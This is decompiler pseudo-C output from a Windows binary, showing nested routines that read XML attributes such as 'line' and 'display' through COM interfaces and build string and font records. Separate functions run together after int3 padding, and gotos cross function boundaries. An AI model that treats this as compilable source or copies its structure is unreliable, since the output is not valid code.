											return E6E7E440A(_v20 ^ _t1896);
										} else {
											_v24 = 0;
											_v8 = 8;
											_t1522 = _v36;
											if(_t1522 == 0) {
												goto L80;
											} else {
												_t1582 =  *_t1522;
												_t1791 =  &_v24;
												_push(_t1791);
												_push(_t1522);
												if( *((intOrPtr*)(_t1582 + 0x1c))() < 0) {
													L46:
													 *_t1558(_v24);
													goto L47;
												} else {
													_t1525 = _v36;
													if(_t1525 == 0) {
														goto L80;
													} else {
														_t1791 =  &_v76;
														_t1526 =  *((intOrPtr*)( *_t1525 + 0x20))(_t1525, _t1791);
														_t1955 = _t1526;
														if(_t1526 < 0) {
															goto L46;
														} else {
															_t1582 =  &_v32;
															_v32 = 0;
															E6E7D8390(_t1582, _t1791, _t1955, _v24);
															_v8 = 0xd;
															__imp__#8( &_v60);
															_t908 =  &_v60;
															__imp__#10(_t908,  &_v76);
															_t1956 = _t908;
															if(_t908 < 0) {
																L82:
																E6E7E7D20(_t908);
																L83:
																E6E7E7D20(0x80004003);
																L84:
																__imp__#6(_t1823);
																L85:
																E6E7D81D0(0x8007000e);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t1896);
																_t1897 = _t1915;
																_push(0xffffffff);
																_push(E6E808D28);
																_push( *[fs:0x0]);
																_t1916 = _t1915 - 0x54;
																_t913 =  *0x6e81e008; // 0x77dcee0d
																_t914 = _t913 ^ _t1897;
																_v152 = _t914;
																_push(_t1558);
																_push(_t1834);
																_push(_t1823);
																_push(_t914);
																 *[fs:0x0] =  &_v148;
																_t1559 = _t1791;
																_v156 = 0;
																_v140 = 0;
																_t1583 =  *_t1582;
																__eflags = _t1583;
																if(_t1583 == 0) {
																	L121:
																	E6E7E7D20(0x80004003);
																	goto L122;
																} else {
																	_t1791 =  &_v28;
																	_v12 = 0;
																	_v28 = 0;
																	 *((intOrPtr*)( *_t1583 + 0x34))(_t1583,  &_v28);
																	_t1456 = _v28;
																	__eflags = _t1456;
																	if(_t1456 == 0) {
																		L114:
																		goto L115;
																	} else {
																		_t1823 = __imp__#6;
																		while(1) {
																			_v36 = 0;
																			_v12 = 2;
																			__eflags = _t1456;
																			if(_t1456 == 0) {
																				goto L121;
																			}
																			_t1791 =  &_v36;
																			_t1460 =  *((intOrPtr*)( *_t1456 + 0x1c))(_t1456,  &_v36);
																			__eflags = _t1460;
																			if(_t1460 < 0) {
																				L120:
																				 *_t1823(_v36);
																				_t1456 = _v28;
																				L115:
																				_v12 = 0xd;
																				__eflags = _t1456;
																				if(_t1456 != 0) {
																					 *((intOrPtr*)( *_t1456 + 8))(_t1456);
																				}
																				 *[fs:0x0] = _v20;
																				__eflags = _v24 ^ _t1897;
																				return E6E7E440A(_v24 ^ _t1897);
																			} else {
																				_t1462 = MultiByteToWideChar(3, 0, "line", 0xffffffff, 0, 0);
																				_t1834 = _t1462;
																				_t136 = _t1834 - 1; // -1
																				_t1583 = _t136;
																				__imp__#4(0, _t1583);
																				_t1823 = _t1462;
																				__eflags = _t1823;
																				if(_t1823 == 0) {
																					L123:
																					E6E7D81D0(0x8007000e);
																					goto L124;
																				} else {
																					_t1463 = MultiByteToWideChar(3, 0, "line", 0xffffffff, _t1823, _t1834);
																					__eflags = _t1463 - _t1834;
																					if(_t1463 != _t1834) {
																						L122:
																						__imp__#6(_t1823);
																						goto L123;
																					} else {
																						__eflags = _t1823;
																						if(_t1823 == 0) {
																							goto L123;
																						} else {
																							__imp__#314(_v36, _t1823, 0x400, 0);
																							_t1823 = __imp__#6;
																							_t1834 = _t1463;
																							 *_t1823(_t1823);
																							__eflags = _t1834 - 1;
																							if(_t1834 != 1) {
																								L104:
																								_v32 = 0;
																								_v12 = 6;
																								_t1465 = _v28;
																								__eflags = _t1465;
																								if(_t1465 == 0) {
																									goto L121;
																								} else {
																									_t1583 =  *_t1465;
																									_t1791 =  &_v32;
																									_v12 = 6;
																									_v32 = 0;
																									_t1466 =  *((intOrPtr*)(_t1583 + 0x40))(_t1465,  &_v32);
																									__eflags = _t1466;
																									if(_t1466 < 0) {
																										_v12 = 8;
																										_t1467 = _v32;
																										__eflags = _t1467;
																										if(_t1467 != 0) {
																											 *((intOrPtr*)( *_t1467 + 8))(_t1467);
																										}
																										goto L120;
																									} else {
																										_t1834 = _v28;
																										_t1469 = _v32;
																										__eflags = _t1834 - _t1469;
																										if(_t1834 != _t1469) {
																											_v28 = _t1469;
																											_v12 = 0xb;
																											__eflags = _t1469;
																											if(_t1469 != 0) {
																												_t1583 =  *_t1469;
																												 *((intOrPtr*)(_t1583 + 4))(_t1469);
																												_t1469 = _v32;
																											}
																											_v12 = 0xa;
																											__eflags = _t1834;
																											if(_t1834 != 0) {
																												 *((intOrPtr*)( *_t1834 + 8))(_t1834);
																												_t1469 = _v32;
																											}
																										}
																										_v12 = 0xc;
																										__eflags = _t1469;
																										if(_t1469 != 0) {
																											_t1583 =  *_t1469;
																											 *((intOrPtr*)(_t1583 + 8))(_t1469);
																										}
																										 *_t1823(_v36);
																										_t1456 = _v28;
																										__eflags = _t1456;
																										if(_t1456 != 0) {
																											continue;
																										} else {
																											goto L114;
																										}
																									}
																								}
																							} else {
																								_push(5);
																								_v80 = 0;
																								_v76 = 7;
																								_v96 = 0;
																								_t1476 = E6E7DBC80(_t1559,  &_v96, _t1823, _t1834, _t1975, L"Arial");
																								asm("movsd xmm0, [0x6e8185a0]");
																								_v72 = _t1834;
																								_v68 = 0xffffff;
																								asm("movsd [ebp-0x38], xmm0");
																								_v56 = 0;
																								_v52 = 0;
																								_v48 = 0;
																								_v12 = 4;
																								L139();
																								__eflags = _t1476;
																								if(_t1476 != 0) {
																									_t1834 =  *(_t1559 + 4);
																									_push( &_v96);
																									__eflags =  *((intOrPtr*)(_t1559 + 8)) - _t1834;
																									if( *((intOrPtr*)(_t1559 + 8)) == _t1834) {
																										_push(_t1834);
																										E6E7DC380(_t1559, _t1975);
																									} else {
																										_v100 = _t1834;
																										E6E7DCCA0(_t1834);
																										 *((char*)(_t1834 + 0x18)) = _v72;
																										 *((char*)(_t1834 + 0x19)) = _v71;
																										 *((intOrPtr*)(_t1834 + 0x1c)) = _v68;
																										asm("movsd xmm0, [ebp-0x38]");
																										asm("movsd [esi+0x20], xmm0");
																										_v12 = 5;
																										E6E7DCB10(_t1834 + 0x28, _t1975,  &_v56);
																										 *(_t1559 + 4) =  *(_t1559 + 4) + 0x38;
																									}
																								}
																								_t1583 =  &_v56;
																								_v12 = 2;
																								E6E7DBC00(_t1559, _t1583, _t1823, _t1834, _t1975);
																								_t1791 = _v76;
																								__eflags = _t1791 - 8;
																								if(_t1791 < 8) {
																									L103:
																									__eflags = 0;
																									_v80 = 0;
																									_v76 = 7;
																									_v96 = 0;
																									goto L104;
																								} else {
																									_t1583 = _v96;
																									_t1791 = 2 + _t1791 * 2;
																									_t1479 = _t1583;
																									__eflags = _t1791 - 0x1000;
																									if(_t1791 < 0x1000) {
																										L102:
																										_push(_t1791);
																										E6E7E441B(_t1583);
																										_t1916 = _t1916 + 8;
																										goto L103;
																									} else {
																										_t1583 =  *(_t1583 - 4);
																										_t1791 = _t1791 + 0x23;
																										__eflags = _t1479 - _t1583 + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											L124:
																											E6E7EE5E6(_t1559, _t1583, _t1791, _t1823, __eflags);
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											_push(_t1834);
																											_t1835 = _t1583;
																											E6E7DBC00(_t1559, _t1835 + 0x28, _t1823, _t1835, _t1975);
																											_t1585 =  *(_t1835 + 0x14);
																											__eflags = _t1585 - 8;
																											if(_t1585 < 8) {
																												L130:
																												 *(_t1835 + 0x10) = 0;
																												__eflags = 0;
																												 *(_t1835 + 0x14) = 7;
																												 *_t1835 = 0;
																												return 0;
																											} else {
																												_t921 =  *_t1835;
																												_t1586 = 2 + _t1585 * 2;
																												__eflags = _t1586 - 0x1000;
																												if(_t1586 < 0x1000) {
																													L129:
																													_push(_t1586);
																													E6E7E441B(_t921);
																													goto L130;
																												} else {
																													_t1792 =  *((intOrPtr*)(_t921 - 4));
																													_t1586 =  &(_t1586[8]);
																													__eflags = _t921 - _t1792 + 0xfffffffc - 0x1f;
																													if(__eflags > 0) {
																														E6E7EE5E6(_t1559, _t1586, _t1792, _t1823, __eflags);
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														_push(_t1835);
																														_t1837 = _t1586;
																														_t1587 = _t1837[5];
																														__eflags = _t1587 - 8;
																														if(_t1587 < 8) {
																															L137:
																															_t1837[4] = 0;
																															__eflags = 0;
																															_t1837[5] = 7;
																															 *_t1837 = 0;
																															return 0;
																														} else {
																															_t927 =  *_t1837;
																															_t1588 = 2 + _t1587 * 2;
																															__eflags = _t1588 - 0x1000;
																															if(_t1588 < 0x1000) {
																																L136:
																																_push(_t1588);
																																E6E7E441B(_t927);
																																goto L137;
																															} else {
																																_t1793 =  *(_t927 - 4);
																																_t1588 = _t1588 + 0x23;
																																__eflags = _t927 - _t1793 + 0xfffffffc - 0x1f;
																																if(__eflags > 0) {
																																	E6E7EE5E6(_t1559, _t1588, _t1793, _t1823, __eflags);
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	_push(_t1897);
																																	_t1898 = _t1916;
																																	_push(0xffffffff);
																																	_push(E6E808DCA);
																																	_push( *[fs:0x0]);
																																	_t1919 = _t1916 - 0xd4;
																																	_t933 =  *0x6e81e008; // 0x77dcee0d
																																	_t934 = _t933 ^ _t1898;
																																	_v276 = _t934;
																																	_push(_t1559);
																																	_push(_t1837);
																																	_push(_t1823);
																																	_push(_t934);
																																	 *[fs:0x0] =  &_v272;
																																	_v432 = _t1793;
																																	_t936 = _t1588;
																																	_v480 = _t936;
																																	_v296 = 0;
																																	_v264 = 0;
																																	_t1839 =  *_t936;
																																	__eflags = _t1839;
																																	if(_t1839 == 0) {
																																		L320:
																																		E6E7E7D20(0x80004003);
																																		goto L321;
																																	} else {
																																		_t1588 =  &_v48;
																																		_v16 = 0;
																																		_v48 = 0;
																																		_t1288 =  *((intOrPtr*)( *_t1839 + 0x44))(_t1839, _t1588);
																																		__eflags = _t1288;
																																		if(_t1288 < 0) {
																																			L316:
																																			__eflags = 0;
																																			goto L317;
																																		} else {
																																			_t1292 = _v48;
																																			__eflags = _t1292;
																																			if(_t1292 == 0) {
																																				L321:
																																				_t938 = E6E7E7D20(0x80004003);
																																				goto L322;
																																			} else {
																																				_t1588 =  *_t1292;
																																				_t1793 =  &_v52;
																																				_t1293 =  *((intOrPtr*)(_t1588 + 0x2c))(_t1292,  &_v52);
																																				__eflags = _t1293;
																																				if(_t1293 < 0) {
																																					goto L316;
																																				} else {
																																					_t1294 = 0;
																																					_v44 = 0;
																																					_v16 = 4;
																																					_t1559 = __imp__#6;
																																					_v188 = 0;
																																					__eflags = _v52;
																																					if(_v52 <= 0) {
																																						L274:
																																						_v36 = 0;
																																						_v16 = 0x11;
																																						_t1588 =  *_v232;
																																						__eflags = _t1588;
																																						if(_t1588 == 0) {
																																							goto L323;
																																						} else {
																																							_t1793 =  &_v36;
																																							_v16 = 0x11;
																																							_v36 = 0;
																																							 *((intOrPtr*)( *_t1588 + 0x34))(_t1588,  &_v36);
																																							_t1297 = _v36;
																																							__eflags = _t1297;
																																							if(_t1297 == 0) {
																																								L308:
																																								goto L309;
																																							} else {
																																								while(1) {
																																									_v40 = 0;
																																									_v16 = 0x13;
																																									__eflags = _t1297;
																																									if(_t1297 == 0) {
																																										goto L320;
																																									}
																																									_t1793 =  &_v40;
																																									_t1301 =  *((intOrPtr*)( *_t1297 + 0x1c))(_t1297,  &_v40);
																																									__eflags = _t1301;
																																									if(_t1301 < 0) {
																																										L315:
																																										 *_t1559(_v40);
																																										_t1297 = _v36;
																																										L309:
																																										_v16 = 0x23;
																																										__eflags = _t1297;
																																										if(_t1297 != 0) {
																																											 *((intOrPtr*)( *_t1297 + 8))(_t1297);
																																										}
																																										goto L311;
																																									} else {
																																										_t1303 = MultiByteToWideChar(3, 0, "display", 0xffffffff, 0, 0);
																																										_t1839 = _t1303;
																																										_t366 = _t1839 - 1; // -1
																																										_t1588 = _t366;
																																										__imp__#4(0, _t1588);
																																										_t1823 = _t1303;
																																										__eflags = _t1823;
																																										if(_t1823 == 0) {
																																											goto L325;
																																										} else {
																																											_t1304 = MultiByteToWideChar(3, 0, "display", 0xffffffff, _t1823, _t1839);
																																											__eflags = _t1304 - _t1839;
																																											if(_t1304 != _t1839) {
																																												goto L324;
																																											} else {
																																												__eflags = _t1823;
																																												if(_t1823 == 0) {
																																													goto L325;
																																												} else {
																																													__imp__#314(_v40, _t1823, 0x400, 0);
																																													_t1839 = _t1304;
																																													 *_t1559(_t1823);
																																													__eflags = _t1839 - 1;
																																													if(_t1839 != 1) {
																																														L298:
																																														_v32 = 0;
																																														_v16 = 0x1a;
																																														_t1306 = _v36;
																																														__eflags = _t1306;
																																														if(_t1306 == 0) {
																																															goto L320;
																																														} else {
																																															_t1588 =  *_t1306;
																																															_t1793 =  &_v32;
																																															_v16 = 0x1a;
																																															_v32 = 0;
																																															_t1307 =  *((intOrPtr*)(_t1588 + 0x40))(_t1306,  &_v32);
																																															__eflags = _t1307;
																																															if(_t1307 < 0) {
																																																_v16 = 0x1c;
																																																_t1308 = _v32;
																																																__eflags = _t1308;
																																																if(_t1308 != 0) {
																																																	 *((intOrPtr*)( *_t1308 + 8))(_t1308);
																																																}
																																																goto L315;
																																															} else {
																																																_t1839 = _v36;
																																																_t1310 = _v32;
																																																__eflags = _t1839 - _t1310;
																																																if(_t1839 != _t1310) {
																																																	_v36 = _t1310;
																																																	_v16 = 0x21;
																																																	__eflags = _t1310;
																																																	if(_t1310 != 0) {
																																																		_t1588 =  *_t1310;
																																																		 *((intOrPtr*)(_t1588 + 4))(_t1310);
																																																		_t1310 = _v32;
																																																	}
																																																	_v16 = 0x20;
																																																	__eflags = _t1839;
																																																	if(_t1839 != 0) {
																																																		 *((intOrPtr*)( *_t1839 + 8))(_t1839);
																																																		_t1310 = _v32;
																																																	}
																																																}
																																																_v16 = 0x22;
																																																__eflags = _t1310;
																																																if(_t1310 != 0) {
																																																	_t1588 =  *_t1310;
																																																	 *((intOrPtr*)(_t1588 + 8))(_t1310);
																																																}
																																																 *_t1559(_v40);
																																																_t1297 = _v36;
																																																__eflags = _t1297;
																																																if(_t1297 != 0) {
																																																	continue;
																																																} else {
																																																	goto L308;
																																																}
																																															}
																																														}
																																													} else {
																																														_v140 = 0;
																																														asm("xorps xmm0, xmm0");
																																														_v136 = 7;
																																														_v156 = 0;
																																														_v116 = 0;
																																														_v112 = 7;
																																														_v132 = 0;
																																														_v92 = 0;
																																														_v88 = 7;
																																														_v108 = 0;
																																														_v84 = 0;
																																														_v80 = 0;
																																														asm("movsd [ebp-0x40], xmm0");
																																														_v16 = 0x17;
																																														_t1588 =  &_v36;
																																														L344();
																																														__eflags = 0;
																																														if(0 != 0) {
																																															_t1823 = _v184;
																																															_push( &_v156);
																																															_t1839 = _t1823[0x16];
																																															__eflags = _t1823[0x18] - _t1839;
																																															if(_t1823[0x18] == _t1839) {
																																																_t1588 =  &(_t1823[0x14]);
																																																E6E7DC5E0(_t1588, _t1975, _t1839);
																																															} else {
																																																_v180 = _t1839;
																																																E6E7DCCA0(_t1839);
																																																_v16 = 0x18;
																																																E6E7DCCA0(_t1839 + 0x18,  &_v132);
																																																_v16 = 0x19;
																																																_t1588 = _t1839 + 0x30;
																																																E6E7DCCA0(_t1588,  &_v108);
																																																asm("movsd xmm0, [ebp-0x40]");
																																																 *((intOrPtr*)(_t1839 + 0x48)) = _v84;
																																																 *((intOrPtr*)(_t1839 + 0x4c)) = _v80;
																																																asm("movsd [esi+0x50], xmm0");
																																																_t1823[0x16] = _t1823[0x16] + 0x58;
																																															}
																																														}
																																														_v16 = 0x13;
																																														_t1815 = _v88;
																																														__eflags = _t1815 - 8;
																																														if(_t1815 < 8) {
																																															L290:
																																															_t1816 = _v112;
																																															__eflags = _t1816 - 8;
																																															if(_t1816 < 8) {
																																																L294:
																																																_t1793 = _v136;
																																																__eflags = _t1793 - 8;
																																																if(_t1793 < 8) {
																																																	goto L298;
																																																} else {
																																																	_t1588 = _v156;
																																																	_t1793 = 2 + _t1793 * 2;
																																																	_t1317 = _t1588;
																																																	__eflags = _t1793 - 0x1000;
																																																	if(_t1793 < 0x1000) {
																																																		L297:
																																																		_push(_t1793);
																																																		E6E7E441B(_t1588);
																																																		_t1919 = _t1919 + 8;
																																																		goto L298;
																																																	} else {
																																																		_t1588 =  *(_t1588 - 4);
																																																		_t1793 = _t1793 + 0x23;
																																																		__eflags = _t1317 - _t1588 + 0xfffffffc - 0x1f;
																																																		if(__eflags > 0) {
																																																			goto L326;
																																																		} else {
																																																			goto L297;
																																																		}
																																																	}
																																																}
																																															} else {
																																																_t1588 = _v132;
																																																_t1817 = 2 + _t1816 * 2;
																																																_t1321 = _t1588;
																																																__eflags = _t1817 - 0x1000;
																																																if(_t1817 < 0x1000) {
																																																	L293:
																																																	_push(_t1817);
																																																	E6E7E441B(_t1588);
																																																	_t1919 = _t1919 + 8;
																																																	goto L294;
																																																} else {
																																																	_t1588 =  *(_t1588 - 4);
																																																	_t1793 = _t1817 + 0x23;
																																																	__eflags = _t1321 - _t1588 + 0xfffffffc - 0x1f;
																																																	if(__eflags > 0) {
																																																		goto L326;
																																																	} else {
																																																		goto L293;
																																																	}
																																																}
																																															}
																																														} else {
																																															_t1588 = _v108;
																																															_t1818 = 2 + _t1815 * 2;
																																															_t1325 = _t1588;
																																															__eflags = _t1818 - 0x1000;
																																															if(_t1818 < 0x1000) {
																																																L289:
																																																_push(_t1818);
																																																E6E7E441B(_t1588);
																																																_t1919 = _t1919 + 8;
																																																goto L290;
																																															} else {
																																																_t1588 =  *(_t1588 - 4);
																																																_t1793 = _t1818 + 0x23;
																																																__eflags = _t1325 - _t1588 + 0xfffffffc - 0x1f;
																																																if(__eflags > 0) {
																																																	goto L326;
																																																} else {
																																																	goto L289;
																																																}
																																															}
																																														}
																																													}
																																												}
																																											}
																																										}
																																									}
																																									goto L686;
																																								}
																																								goto L320;
																																							}
																																						}
																																					} else {
																																						while(1) {
																																							_t1839 = _v48;
																																							__eflags = _t1839;
																																							if(_t1839 == 0) {
																																								goto L320;
																																							}
																																							_t1588 =  *_t1839;
																																							_t1823 =  *(_t1588 + 0x28);
																																							_v16 = 5;
																																							__eflags = _t1294;
																																							if(_t1294 != 0) {
																																								_t1588 =  *_t1294;
																																								 *((intOrPtr*)(_t1588 + 8))(_t1294);
																																							}
																																							_v16 = 4;
																																							_v44 = 0;
																																							_t1339 =  *_t1823(_t1839, _v188,  &_v44);
																																							__eflags = _t1339;
																																							if(_t1339 < 0) {
																																								L273:
																																								L311:
																																								_v16 = 0x24;
																																								_t1298 = _v44;
																																								__eflags = _t1298;
																																								if(_t1298 != 0) {
																																									 *((intOrPtr*)( *_t1298 + 8))(_t1298);
																																								}
																																								L317:
																																								_v16 = 0x25;
																																								_t1713 = _v48;
																																								__eflags = _t1713;
																																								if(_t1713 != 0) {
																																									 *((intOrPtr*)( *_t1713 + 8))(_t1713);
																																								}
																																								 *[fs:0x0] = _v24;
																																								__eflags = _v28 ^ _t1898;
																																								return E6E7E440A(_v28 ^ _t1898);
																																							} else {
																																								_v40 = 0;
																																								_v16 = 8;
																																								_t1340 = _v44;
																																								__eflags = _t1340;
																																								if(_t1340 == 0) {
																																									goto L320;
																																								} else {
																																									_t1588 =  *_t1340;
																																									_t1793 =  &_v40;
																																									_t1341 =  *((intOrPtr*)(_t1588 + 0x1c))(_t1340,  &_v40);
																																									__eflags = _t1341;
																																									if(_t1341 < 0) {
																																										L272:
																																										 *_t1559(_v40);
																																										goto L273;
																																									} else {
																																										_t1343 = _v44;
																																										__eflags = _t1343;
																																										if(_t1343 == 0) {
																																											goto L320;
																																										} else {
																																											_t1793 =  &_v172;
																																											__eflags =  *((intOrPtr*)( *_t1343 + 0x20))(_t1343,  &_v172);
																																											if(__eflags < 0) {
																																												goto L272;
																																											} else {
																																												_t1588 =  &_v32;
																																												_v32 = 0;
																																												E6E7D8390(_t1588,  &_v172, __eflags, _v40);
																																												_v16 = 0xd;
																																												__imp__#8( &_v68);
																																												_t938 =  &_v68;
																																												__imp__#10(_t938,  &_v172);
																																												__eflags = _t938;
																																												if(__eflags < 0) {
																																													L322:
																																													E6E7E7D20(_t938);
																																													L323:
																																													E6E7E7D20(0x80004003);
																																													L324:
																																													 *_t1559(_t1823);
																																													L325:
																																													E6E7D81D0(0x8007000e);
																																													L326:
																																													E6E7EE5E6(_t1559, _t1588, _t1793, _t1823, __eflags);
																																													asm("int3");
																																													asm("int3");
																																													asm("int3");
																																													_push(_t1839);
																																													_t1840 = _t1588;
																																													_t1589 =  *(_t1840 + 0x44);
																																													__eflags = _t1589 - 8;
																																													if(_t1589 < 8) {
																																														L332:
																																														 *(_t1840 + 0x40) = 0;
																																														 *(_t1840 + 0x44) = 7;
																																														 *((short*)(_t1840 + 0x30)) = 0;
																																														_t1590 =  *(_t1840 + 0x2c);
																																														__eflags = _t1590 - 8;
																																														if(_t1590 < 8) {
																																															L337:
																																															 *(_t1840 + 0x28) = 0;
																																															 *(_t1840 + 0x2c) = 7;
																																															 *((short*)(_t1840 + 0x18)) = 0;
																																															_t1591 =  *(_t1840 + 0x14);
																																															__eflags = _t1591 - 8;
																																															if(_t1591 < 8) {
																																																L342:
																																																 *(_t1840 + 0x10) = 0;
																																																__eflags = 0;
																																																 *(_t1840 + 0x14) = 7;
																																																 *_t1840 = 0;
																																																return 0;
																																															} else {
																																																_t947 =  *_t1840;
																																																_t1592 = 2 + _t1591 * 2;
																																																__eflags = _t1592 - 0x1000;
																																																if(_t1592 < 0x1000) {
																																																	L341:
																																																	_push(_t1592);
																																																	E6E7E441B(_t947);
																																																	goto L342;
																																																} else {
																																																	_t1794 =  *((intOrPtr*)(_t947 - 4));
																																																	_t1592 =  &(_t1592[8]);
																																																	__eflags = _t947 - _t1794 + 0xfffffffc - 0x1f;
																																																	if(__eflags > 0) {
																																																		goto L343;
																																																	} else {
																																																		_t947 = _t1794;
																																																		goto L341;
																																																	}
																																																}
																																															}
																																														} else {
																																															_t1279 =  *((intOrPtr*)(_t1840 + 0x18));
																																															_t1711 = 2 + _t1590 * 2;
																																															__eflags = _t1711 - 0x1000;
																																															if(_t1711 < 0x1000) {
																																																L336:
																																																_push(_t1711);
																																																E6E7E441B(_t1279);
																																																_t1919 = _t1919 + 8;
																																																goto L337;
																																															} else {
																																																_t1794 =  *((intOrPtr*)(_t1279 - 4));
																																																_t1592 = _t1711 + 0x23;
																																																__eflags = _t1279 - _t1794 + 0xfffffffc - 0x1f;
																																																if(__eflags > 0) {
																																																	goto L343;
																																																} else {
																																																	_t1279 = _t1794;
																																																	goto L336;
																																																}
																																															}
																																														}
																																													} else {
																																														_t1283 =  *((intOrPtr*)(_t1840 + 0x30));
																																														_t1712 = 2 + _t1589 * 2;
																																														__eflags = _t1712 - 0x1000;
																																														if(_t1712 < 0x1000) {
																																															L331:
																																															_push(_t1712);
																																															E6E7E441B(_t1283);
																																															_t1919 = _t1919 + 8;
																																															goto L332;
																																														} else {
																																															_t1794 =  *((intOrPtr*)(_t1283 - 4));
																																															_t1592 = _t1712 + 0x23;
																																															__eflags = _t1283 - _t1794 + 0xfffffffc - 0x1f;
																																															if(__eflags > 0) {
																																																L343:
																																																E6E7EE5E6(_t1559, _t1592, _t1794, _t1823, __eflags);
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																_push(_t1898);
																																																_t1899 = _t1919;
																																																_push(0xffffffff);
																																																_push(E6E808E5B);
																																																_push( *[fs:0x0]);
																																																_t1921 = _t1919 - 0x7c;
																																																_t953 =  *0x6e81e008; // 0x77dcee0d
																																																_t954 = _t953 ^ _t1899;
																																																_v532 = _t954;
																																																_push(_t1559);
																																																_push(_t1840);
																																																_push(_t1823);
																																																_push(_t954);
																																																 *[fs:0x0] =  &_v528;
																																																_v596 = _t1794;
																																																_v544 = 0;
																																																_v520 = 0;
																																																_t1593 =  *_t1592;
																																																__eflags = _t1593;
																																																if(_t1593 == 0) {
																																																	L506:
																																																	E6E7E7D20(0x80004003);
																																																	goto L507;
																																																} else {
																																																	_t1794 =  &_v44;
																																																	_v20 = 0;
																																																	_v44 = 0;
																																																	_t1142 =  *((intOrPtr*)( *_t1593 + 0x44))(_t1593, _t1794);
																																																	__eflags = _t1142;
																																																	if(_t1142 < 0) {
																																																		L502:
																																																		__eflags = 0;
																																																		goto L503;
																																																	} else {
																																																		_t1146 = _v44;
																																																		__eflags = _t1146;
																																																		if(_t1146 == 0) {
																																																			L507:
																																																			_t957 = E6E7E7D20(0x80004003);
																																																			goto L508;
																																																		} else {
																																																			_t1593 =  *_t1146;
																																																			_t1794 =  &_v52;
																																																			_t1147 =  *((intOrPtr*)(_t1593 + 0x2c))(_t1146, _t1794);
																																																			__eflags = _t1147;
																																																			if(_t1147 < 0) {
																																																				goto L502;
																																																			} else {
																																																				_t1148 = 0;
																																																				_v40 = 0;
																																																				_v20 = 4;
																																																				_v100 = 0;
																																																				__eflags = _v52;
																																																				if(_v52 <= 0) {
																																																					L497:
																																																					goto L498;
																																																				} else {
																																																					_t1559 = __imp__#6;
																																																					while(1) {
																																																						_t1840 = _v44;
																																																						__eflags = _t1840;
																																																						if(_t1840 == 0) {
																																																							goto L506;
																																																						}
																																																						_t1593 =  *_t1840;
																																																						_t1823 =  *(_t1593 + 0x28);
																																																						_v20 = 5;
																																																						__eflags = _t1148;
																																																						if(_t1148 != 0) {
																																																							_t1593 =  *_t1148;
																																																							 *((intOrPtr*)(_t1593 + 8))(_t1148);
																																																						}
																																																						_v20 = 4;
																																																						_v40 = 0;
																																																						_t1151 =  *_t1823(_t1840, _v100,  &_v40);
																																																						__eflags = _t1151;
																																																						if(_t1151 < 0) {
																																																							L501:
																																																							_t1148 = _v40;
																																																							L498:
																																																							_v20 = 0x15;
																																																							__eflags = _t1148;
																																																							if(_t1148 != 0) {
																																																								 *((intOrPtr*)( *_t1148 + 8))(_t1148);
																																																							}
																																																							L503:
																																																							_v20 = 0x16;
																																																							_t1654 = _v44;
																																																							__eflags = _t1654;
																																																							if(_t1654 != 0) {
																																																								 *((intOrPtr*)( *_t1654 + 8))(_t1654);
																																																							}
																																																							 *[fs:0x0] = _v28;
																																																							__eflags = _v32 ^ _t1899;
																																																							return E6E7E440A(_v32 ^ _t1899);
																																																						} else {
																																																							_v48 = 0;
																																																							_v20 = 8;
																																																							_t1152 = _v40;
																																																							__eflags = _t1152;
																																																							if(_t1152 == 0) {
																																																								goto L506;
																																																							} else {
																																																								_t1593 =  *_t1152;
																																																								_t1794 =  &_v48;
																																																								_t1153 =  *((intOrPtr*)(_t1593 + 0x1c))(_t1152, _t1794);
																																																								__eflags = _t1153;
																																																								if(_t1153 < 0) {
																																																									L500:
																																																									 *_t1559(_v48);
																																																									goto L501;
																																																								} else {
																																																									_t1155 = _v40;
																																																									__eflags = _t1155;
																																																									if(_t1155 == 0) {
																																																										goto L506;
																																																									} else {
																																																										_t1794 =  &_v88;
																																																										__eflags =  *((intOrPtr*)( *_t1155 + 0x20))(_t1155, _t1794);
																																																										if(__eflags < 0) {
																																																											goto L500;
																																																										} else {
																																																											_t1593 =  &_v36;
																																																											_v36 = 0;
																																																											E6E7D8390(_t1593, _t1794, __eflags, _v48);
																																																											_v20 = 0xd;
																																																											__imp__#8( &_v72);
																																																											_t957 =  &_v72;
																																																											__imp__#10(_t957,  &_v88);
																																																											__eflags = _t957;
																																																											if(__eflags < 0) {
																																																												L508:
																																																												E6E7E7D20(_t957);
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												asm("int3");
																																																												_push(_t1899);
																																																												_t1900 = _t1921;
																																																												_push(0xffffffff);
																																																												_push(E6E808EC8);
																																																												_push( *[fs:0x0]);
																																																												_t1922 = _t1921 - 0x5c;
																																																												_t960 =  *0x6e81e008; // 0x77dcee0d
																																																												_t961 = _t960 ^ _t1900;
																																																												_v688 = _t961;
																																																												_push(_t1559);
																																																												_push(_t1840);
																																																												_push(_t1823);
																																																												_push(_t961);
																																																												 *[fs:0x0] =  &_v684;
																																																												_v768 = _t1794;
																																																												_v696 = 0;
																																																												_v676 = 0;
																																																												_t1594 =  *_t1593;
																																																												__eflags = _t1594;
																																																												if(_t1594 == 0) {
																																																													L588:
																																																													E6E7E7D20(0x80004003);
																																																													goto L589;
																																																												} else {
																																																													_v24 = 0;
																																																													_v44 = 0;
																																																													_t1077 =  *((intOrPtr*)( *_t1594 + 0x44))(_t1594,  &_v44);
																																																													__eflags = _t1077;
																																																													if(_t1077 < 0) {
																																																														L584:
																																																														__eflags = 0;
